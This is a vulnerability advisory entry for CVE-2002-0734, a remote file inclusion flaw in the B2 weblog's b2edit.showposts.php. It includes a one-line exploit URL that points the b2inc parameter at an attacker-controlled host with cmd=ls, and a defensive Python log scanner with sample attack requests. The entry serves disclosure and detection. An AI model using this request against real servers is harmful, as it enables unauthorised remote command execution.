B2 B2config.php Remote Command Execution Vulnerability

Vulnerability ID: 1106714    Vulnerability type: Unknown
Published: 2002-05-06    Updated: 2005-05-02
CVE ID: CVE-2002-0734    CNNVD-ID: CNNVD-200208-125
Platform: PHP    CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/21436
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200208-125
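|Vulnerability Details
B2 is a news/weblog tool written in PHP that lets administrators quickly post news on the front page and lets visitors interact; it runs on Linux and Unix operating systems. The B2config.php script in B2 mishandles a referenced variable, which can allow a remote attacker to execute arbitrary commands on the target system with the privileges of the B2 process. A variable referenced in the PHP scripts does not actually exist, so an attacker can define its value. By creating a PHP script with embedded commands on a server under their control, the attacker can reference this remote file and have arbitrary commands executed on the target server with B2's privileges. The problem is in /b2-include/b2edit.showposts.php: *snippet* Through a remote reference, arbitrary commands can be executed on the target system with the privileges of the B2 process.
|Exploit (EXP)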
source: http://www.securityfocus.com/bid/4673/info

B2 is a news/weblog tool written in PHP. B2 allows webmasters to quickly post news on the front page and lets viewers interact with each other. It is available primarily for Unix and Linux.

A variable that is referenced in the PHP scripts does not actually exist. Thus, an attacker may be able to define the value of the variable. By creating a PHP script on the remote side and embedding commands in it, the attacker is able to reference the remote file. This could potentially allow the attacker to execute commands on the vulnerable system. 

http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls
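
A defensive check for the request pattern shown above, as an added example that is not part of the original advisory: it scans web server access log lines for requests that set the `b2inc` parameter to a remote URL, including percent-encoded forms. The log lines, the host `remote.example`, the client addresses and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache access-log style (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/May/2002:10:00:01 +0000] "GET /b2/index.php?p=12 HTTP/1.0" 200 5120',
    '192.0.2.44 - - [06/May/2002:10:02:17 +0000] "GET /b2/b2-include/b2edit.showposts.php'
    '?b2inc=http://remote.example&cmd=ls HTTP/1.0" 200 734',
    '192.0.2.44 - - [06/May/2002:10:02:40 +0000] "GET /b2/b2-include/b2edit.showposts.php'
    '?b2inc=%68ttp%3A%2F%2Fremote.example HTTP/1.0" 200 734',
    '192.0.2.77 - - [06/May/2002:10:05:03 +0000] "GET /b2/b2edit.php?b2inc=b2-include HTTP/1.0" 200 2048',
]

# Request line inside the quoted field: METHOD target HTTP/x.y
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Value that starts with a URL scheme followed by // (http://, ftp://, php://) or a bare //host
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:)?//', re.IGNORECASE)

def remote_b2inc(line, param="b2inc"):
    """Return the decoded parameter value if the request sets it to a remote URL, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode a second time to catch double-encoded values
        value = unquote(value)
        if name == param and REMOTE_RE.match(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_value) for every log line that trips the check."""
    hits = []
    for line in lines:
        value = remote_b2inc(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"remote include attempt from {ip}: b2inc={value}")
```

A local value such as `b2inc=b2-include` is not flagged, so the check separates requests that supply a remote location from ordinary use of the parameter name.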
|References

Source: BID
Name: 4673
Link: http://www.securityfocus.com/bid/4673
Source: XF
Name: b2-b2inc-command-execution(9013)
Link: http://www.iss.net/security_center/static/9013.php
Source: BUGTRAQ
Name: 20020506b2phpremotecommandexecution
Link: http://archives.neohapsis.com/archives/bugtraq/2002-05/0027.html
Source: cafelog.com
Link: http://cafelog.com/